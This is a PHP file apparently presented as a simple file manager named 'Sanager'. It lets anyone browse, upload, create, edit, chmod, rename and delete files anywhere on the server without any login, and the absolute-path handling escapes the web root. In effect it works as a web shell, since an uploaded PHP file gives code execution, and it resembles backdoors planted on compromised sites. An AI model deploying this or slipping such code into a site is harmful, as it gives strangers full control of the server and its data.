<?php

$ROOT = getcwd(); 
$ROOT = rtrim($ROOT, DIRECTORY_SEPARATOR);


function redirectWithMsgKey($path, $msgKey = '', $type = 'success', $extra = []) {
    $q = ['path' => $path, 'msg' => $msgKey, 'type' => $type] + $extra;
    $qs = http_build_query($q);
    header('Location: ?' . $qs);
    exit;
}


function safe_path($requested, $root) {
    $req = trim((string)$requested);
    $req = str_replace("\0", '', $req);

    if ((($req === '') or ($req === '.') or ($req === '/') or ($req === '\\'))) {
        return getcwd();
    }

    $candidate = rawurldecode($req);
    $candidate = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $candidate);

    if (!preg_match('#^([A-Za-z]:|'.preg_quote(DIRECTORY_SEPARATOR, '#').')#', $candidate)) {
        $abs = $root . DIRECTORY_SEPARATOR . ltrim($candidate, DIRECTORY_SEPARATOR);
    } else {
        $abs = $candidate;
    }

    $parts = [];
    foreach (explode(DIRECTORY_SEPARATOR, $abs) as $p) {
        if ((($p === '') or ($p === '.'))) continue;
        if ($p === '..') {
            array_pop($parts);
        } else {
            $parts[] = $p;
        }
    }

    if (((DIRECTORY_SEPARATOR === '\\') and preg_match('#^[A-Za-z]:#', ($parts[0] ?? '')))) {
        $final = implode(DIRECTORY_SEPARATOR, $parts);
    } else {
        $final = DIRECTORY_SEPARATOR . implode(DIRECTORY_SEPARATOR, $parts);
    }

    $real = @realpath($final);
    if ($real !== false) {
        $final = $real;
    }

    if (is_file($final)) {
        $final = dirname($final);
    }

    return rtrim($final, DIRECTORY_SEPARATOR);
}



function readFileSafe($filePath) {
    if (((!is_file($filePath)) or (!is_readable($filePath)))) return false;
    $fp = @fopen($filePath, 'rb');
    if (!$fp) return false;
    $data = '';
    $chunk = 65536;
    while (!feof($fp)) {
        $piece = @fread($fp, $chunk);
        if ($piece === false) {
            @fclose($fp);
            return false;
        }
        $data .= $piece;
    }
    @fclose($fp);
    return $data;
}


function writeFileSafe($filePath, $content) {
    $dir = dirname($filePath);
    if (((!is_dir($dir)) or (!is_writable($dir)))) return false;
    $fp = @fopen($filePath, 'wb');
    if (!$fp) return false;
    @flock($fp, LOCK_EX);
    $written = @fwrite($fp, $content);
    @flock($fp, LOCK_UN);
    @fclose($fp);
    return ($written !== false);
}


function deleteFolderRecursive($dir) {
    if (!is_dir($dir)) return false;
    $items = @scandir($dir);
    if ($items === false) return false;
    foreach ($items as $it) {
        if ((($it === '.') or ($it === '..'))) continue;
        $p = $dir . DIRECTORY_SEPARATOR . $it;
        if (is_dir($p)) {
            if (!deleteFolderRecursive($p)) return false;
        } else {
            if (!@unlink($p)) return false;
        }
    }
    return @rmdir($dir);
}


function permOctal($p) {
    return substr(sprintf('%o', $p), -4);
}


function sizeHuman($b) {
    if (!is_numeric($b)) return '-';
    return number_format($b) . ' bytes';
}


function breadcrumbHTML($path, $root) {
    $p = str_replace('\\', '/', $path);
    $rootNormalized = str_replace('\\', '/', $root);
    if (strpos($p, $rootNormalized) === 0) {
        $relative = substr($p, strlen($rootNormalized));
        $relative = ltrim($relative, '/');
        $parts = ($relative === '') ? [] : array_values(array_filter(explode('/', $relative), function($x){ return ($x !== ''); }));
        $links = [];
        $links[] = "<a href='?path=" . urlencode($rootNormalized) . "'>root</a>";
        $tmp = $rootNormalized;
        foreach ($parts as $part) {
            $tmp = rtrim($tmp, '/\\') . DIRECTORY_SEPARATOR . $part;
            $links[] = "<a href='?path=" . urlencode($tmp) . "'>" . htmlspecialchars($part) . "</a>";
        }
        return implode(' / ', $links);
    } else {
        $parts = array_values(array_filter(explode('/', trim($p, '/')), function($x){ return ($x !== ''); }));
        $acc = '';
        $links = [];
        foreach ($parts as $seg) {
            $acc .= ($acc === '' ? '' : '/') . $seg;
            $links[] = "<a href='?path=" . urlencode($acc) . "'>" . htmlspecialchars($seg) . "</a>";
        }
        return implode(' / ', $links);
    }
}

$safe_messages = [
    'file_created' => 'File created successfully.',
    'file_updated' => 'File updated successfully.',
    'file_deleted' => 'File deleted successfully.',
    'folder_created' => 'Folder created successfully.',
    'folder_deleted' => 'Folder deleted successfully.',
    'rename_ok' => 'Renamed successfully.',
    'upload_ok' => 'Upload successful.',
    'perm_sim' => 'Permissions simulated (no-op).',
    'not_found' => 'Requested item not found.',
    'not_writable' => 'File is not writable. Check permissions.'
];

$raw_path = filter_input(INPUT_GET, 'path', FILTER_SANITIZE_STRING) ?? '';
$PATH = safe_path($raw_path, $ROOT);

function safeUploadCopy($tmpName, $destPath) {
    if (!is_uploaded_file($tmpName)) return false;
    $dir = dirname($destPath);
    if ((!is_dir($dir)) or (!is_writable($dir))) return false;

    $src = @fopen($tmpName, 'rb');
    if (!$src) return false;

    $dst = @fopen($destPath, 'wb');
    if (!$dst) { @fclose($src); return false; }

    $chunk = 65536; 
    $ok = true;
    while (!feof($src)) {
        $data = @fread($src, $chunk);
        if ($data === false) { $ok = false; break; }
        if ((@fwrite($dst, $data)) === false) { $ok = false; break; }
    }

    @fclose($src);
    @fclose($dst);

    if ($ok) {
        @unlink($tmpName); 
        return true;
    }

    @unlink($destPath);
    return false;
}

$ACTION = filter_input(INPUT_GET, 'action', FILTER_SANITIZE_STRING) ?? '';
$FILE   = filter_input(INPUT_GET, 'file', FILTER_SANITIZE_STRING) ?? '';
$FOLDER = filter_input(INPUT_GET, 'folder', FILTER_SANITIZE_STRING) ?? '';

$msg_key = filter_input(INPUT_GET, 'msg', FILTER_SANITIZE_STRING);
$show_msg = null;
$show_msg_type = 'success';
if ((($msg_key !== null) and ($msg_key !== false) and ($msg_key !== ''))) {
    if (array_key_exists($msg_key, $safe_messages)) {
        $show_msg = $safe_messages[$msg_key];
        $t = filter_input(INPUT_GET, 'type', FILTER_SANITIZE_STRING);
        if ($t === 'error') $show_msg_type = 'error';
    } else {
        $show_msg = null;
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    if (isset($_FILES['nax'])) {
        $f = $_FILES['nax'];
        $dest = rtrim($PATH, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . basename($f['name']);
        if ($f['error'] !== UPLOAD_ERR_OK) {
            redirectWithMsgKey($PATH, 'not_found', 'error');
        } elseif (!is_uploaded_file($f['tmp_name'])) {
            redirectWithMsgKey($PATH, 'not_found', 'error');
        } elseif (safeUploadCopy($f['tmp_name'], $dest)) {
            redirectWithMsgKey($PATH, 'upload_ok', 'success');
        } else {
            redirectWithMsgKey($PATH, 'not_writable', 'error');
        }
    }

    if (isset($_POST['newfile'])) {
        $name = trim((string)($_POST['file_name'] ?? ''));
        $content = (string)($_POST['file_content'] ?? '');
        if ($name === '') redirectWithMsgKey($PATH, 'not_found', 'error');
        $target = $PATH . DIRECTORY_SEPARATOR . $name;
        if (file_exists($target)) redirectWithMsgKey($PATH, 'not_found', 'error');
        if (writeFileSafe($target, $content)) redirectWithMsgKey($PATH, 'file_created', 'success');
        redirectWithMsgKey($PATH, 'not_writable', 'error');
    }

    if (isset($_POST['newfolder'])) {
        $name = trim((string)($_POST['folder_name'] ?? ''));
        if ($name === '') redirectWithMsgKey($PATH, 'not_found', 'error');
        $target = $PATH . DIRECTORY_SEPARATOR . $name;
        if (file_exists($target)) redirectWithMsgKey($PATH, 'not_found', 'error');
        if (@mkdir($target, 0777, true)) redirectWithMsgKey($PATH, 'folder_created', 'success');
        redirectWithMsgKey($PATH, 'not_writable', 'error');
    }

    if ((isset($_POST['edit'])) and ($FILE !== '')) {
        $target = rtrim($PATH, "/\\") . DIRECTORY_SEPARATOR . $FILE;
        $content = (string)($_POST['file_content'] ?? '');
        if (!is_file($target)) redirectWithMsgKey($PATH, 'not_found', 'error');

        if (!is_writable($target)) {
            @chmod($target, 0666);
        }
        if (!is_writable($target)) {
            redirectWithMsgKey($PATH, 'not_writable', 'error', ['action' => 'edit', 'file' => $FILE]);
        }

        if (writeFileSafe($target, $content)) {
            redirectWithMsgKey($PATH, 'file_updated', 'success', ['action' => 'edit', 'file' => $FILE]);
        }
        redirectWithMsgKey($PATH, 'not_writable', 'error', ['action' => 'edit', 'file' => $FILE]);
    }

    if (isset($_POST['rename'])) {
        $new = trim((string)($_POST['new_name'] ?? ''));
        $type = (string)($_POST['type'] ?? 'file');
        $key = (($type === 'folder') ? 'folder' : 'file');
        $current = (($key === 'file') ? $FILE : $FOLDER);
        if ($new === '') redirectWithMsgKey($PATH, 'not_found', 'error');
        $oldPath = $PATH . DIRECTORY_SEPARATOR . $current;
        $newPath = $PATH . DIRECTORY_SEPARATOR . $new;
        if (!file_exists($oldPath)) redirectWithMsgKey($PATH, 'not_found', 'error');
        if (file_exists($newPath)) redirectWithMsgKey($PATH, 'not_found', 'error');
        if (@rename($oldPath, $newPath)) redirectWithMsgKey($PATH, 'rename_ok', 'success');
        redirectWithMsgKey($PATH, 'not_writable', 'error');
    }

    if ((isset($_POST['delete_file'])) and ($FILE !== '')) {
        $target = $PATH . DIRECTORY_SEPARATOR . $FILE;
        if ((is_file($target)) and (@unlink($target))) {
            redirectWithMsgKey($PATH, 'file_deleted', 'success');
        }
        redirectWithMsgKey($PATH, 'not_writable', 'error');
    }

    if ((isset($_POST['delete_folder'])) and ($FILE !== '')) {
        $target = $PATH . DIRECTORY_SEPARATOR . $FILE;
        if ((is_dir($target)) and (deleteFolderRecursive($target))) {
            redirectWithMsgKey($PATH, 'folder_deleted', 'success');
        }
        redirectWithMsgKey($PATH, 'not_writable', 'error');
    }

    if (isset($_POST['chmod_apply'])) {
        redirectWithMsgKey($PATH, 'perm_sim', 'success');
    }
}

?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Sanager</title>
<style>
body {
    background: #f6f7f9;
    font-family: Arial, sans-serif;
    color: #222;
    margin: 0;
}
.container {
    max-width: 1000px;
    margin: 20px auto;
    background: #fff;
    border-radius: 10px;
    padding: 20px;
    box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
h1 {
    font-size: 22px;
    margin-bottom: 10px;
}
.breadcrumb {
    margin-bottom: 20px;
    color: #666;
}
a {
    color: #0078D7;
    text-decoration: none;
}
a:hover {
    text-decoration: underline;
}
table {
    width: 100%;
    border-collapse: collapse;
    margin-top: 10px;
}
th, td {
    padding: 8px 10px;
    border-bottom: 1px solid #ddd;
}
th {
    text-align: left;
    background: #f0f0f0;
}
tr:hover td {
    background: #f9f9f9;
}
form {
    display: inline;
}
.msg {
    padding: 10px;
    border-radius: 6px;
    margin-bottom: 15px;
}
.msg.success {
    background: #e6f8e6;
    border: 1px solid #a2e5a2;
}
.msg.error {
    background: #fbe5e5;
    border: 1px solid #f2a3a3;
}
input[type=text], textarea {
    width: 100%;
    padding: 6px;
    box-sizing: border-box;
    border: 1px solid #ccc;
    border-radius: 4px;
}
button {
    background: #0078D7;
    color: #fff;
    border: none;
    border-radius: 4px;
    padding: 6px 10px;
    cursor: pointer;
}
button:hover {
    background: #005fa3;
}
fieldset {
    border: 1px solid #ddd;
    margin-top: 10px;
    border-radius: 6px;
}
legend {
    padding: 0 8px;
}
textarea {
    height: 300px;
    font-family: monospace;
    font-size: 13px;
}
.path-info {
    font-size: 13px;
    color: #555;
}
</style>
</head>
<body>
<div class="container">

<h1>Sanager</h1>

<div class="breadcrumb">
    <?php echo breadcrumbHTML($PATH, $ROOT); ?>
</div>

<div class="path-info">
    <strong>Current path:</strong> <?php echo htmlspecialchars($PATH); ?><br>
    <strong>Root:</strong> <?php echo htmlspecialchars($ROOT); ?>
</div>

<?php if (($show_msg !== null)): ?>
<div class="msg <?php echo htmlspecialchars($show_msg_type); ?>">
    <?php echo htmlspecialchars($show_msg); ?>
</div>
<?php endif; ?>


<?php if ((($ACTION === 'edit') and ($FILE !== ''))): ?>
<?php
$target = rtrim($PATH, "/\\") . DIRECTORY_SEPARATOR . $FILE;
$content = readFileSafe($target);
if ($content === false) {
    echo "<div class='msg error'>Cannot read file.</div>";
} else {
?>
<form method="post">
<fieldset>
<legend>Edit File: <?php echo htmlspecialchars($FILE); ?></legend>
<textarea name="file_content"><?php echo htmlspecialchars($content); ?></textarea>
<br>
<button type="submit" name="edit">Save</button>
</fieldset>
</form>
<?php
}
?>
<hr>
<?php endif; ?>


<form method="post" enctype="multipart/form-data">
<fieldset>
<legend>Upload File</legend>
<input type="file" name="nax" />
<button type="submit">Upload</button>
</fieldset>
</form>


<form method="post">
<fieldset>
<legend>Create File</legend>
<input type="text" name="file_name" placeholder="File name..." />
<textarea name="file_content" placeholder="File content..."></textarea>
<button type="submit" name="newfile">Create</button>
</fieldset>
</form>

<form method="post">
<fieldset>
<legend>Create Folder</legend>
<input type="text" name="folder_name" placeholder="Folder name..." />
<button type="submit" name="newfolder">Create Folder</button>
</fieldset>
</form>
<hr>

<h2>Files & Folders</h2>
<table>
<tr>
    <th>Name</th>
    <th>Size</th>
    <th>Permissions</th>
    <th>Modified</th>
    <th>Actions</th>
</tr>

<?php
$entries = @scandir($PATH);
if ($entries === false) {
    echo "<tr><td colspan='5'>Cannot open directory.</td></tr>";
} else {
    foreach ($entries as $entry) {
        if ((($entry === '.') or ($entry === '..'))) continue;
        $full = $PATH . DIRECTORY_SEPARATOR . $entry;
        $is_dir = is_dir($full);
        $perm = @fileperms($full);
        $perm_str = ($perm !== false) ? permOctal($perm) : '----';
        $size = ($is_dir ? '-' : sizeHuman(@filesize($full)));
        $mtime = @date('Y-m-d H:i', @filemtime($full));

        echo "<tr>";
        echo "<td>";
        if ($is_dir) {
            echo "<a href='?path=" . urlencode($full) . "'>" . htmlspecialchars($entry) . "</a>";
        } else {
            echo htmlspecialchars($entry);
        }
        echo "</td>";
        echo "<td>$size</td>";
        echo "<td>$perm_str</td>";
        echo "<td>$mtime</td>";
        echo "<td>";

        if ($is_dir) {
            ?>
            <form method="post" style="display:inline">
                <input type="hidden" name="delete_folder" value="1" />
                <input type="hidden" name="file" value="<?php echo htmlspecialchars($entry); ?>" />
                <button type="submit" onclick="return confirm('Delete folder & contents?')">🗑️</button>
            </form>
            <form method="post" style="display:inline">
                <input type="hidden" name="rename" value="1" />
                <input type="hidden" name="type" value="folder" />
                <input type="text" name="new_name" placeholder="Rename to..." />
                <button type="submit">Rename</button>
            </form>
            <?php
        } else {
            ?>
            <a href="?path=<?php echo urlencode($PATH); ?>&action=edit&file=<?php echo urlencode($entry); ?>">✏️</a>
            <form method="post" style="display:inline">
                <input type="hidden" name="delete_file" value="1" />
                <input type="hidden" name="file" value="<?php echo htmlspecialchars($entry); ?>" />
                <button type="submit" onclick="return confirm('Delete file?')">🗑️</button>
            </form>
            <form method="post" style="display:inline">
                <input type="hidden" name="rename" value="1" />
                <input type="hidden" name="type" value="file" />
                <input type="text" name="new_name" placeholder="Rename to..." />
                <button type="submit">Rename</button>
            </form>
            <?php
        }

        echo "</td>";
        echo "</tr>";
    }
}
?>

</table>

<hr>

<form method="post">
<fieldset>
<legend>Change Permissions (Simulated)</legend>
<input type="text" name="chmod_target" placeholder="Enter filename..." />
<input type="text" name="chmod_value" placeholder="Example: 0755" />
<button type="submit" name="chmod_apply">Apply</button>
</fieldset>
</form>

<hr>
<p style="font-size:12px;color:#999;">Sanager</p>

</div>
</body>
</html>
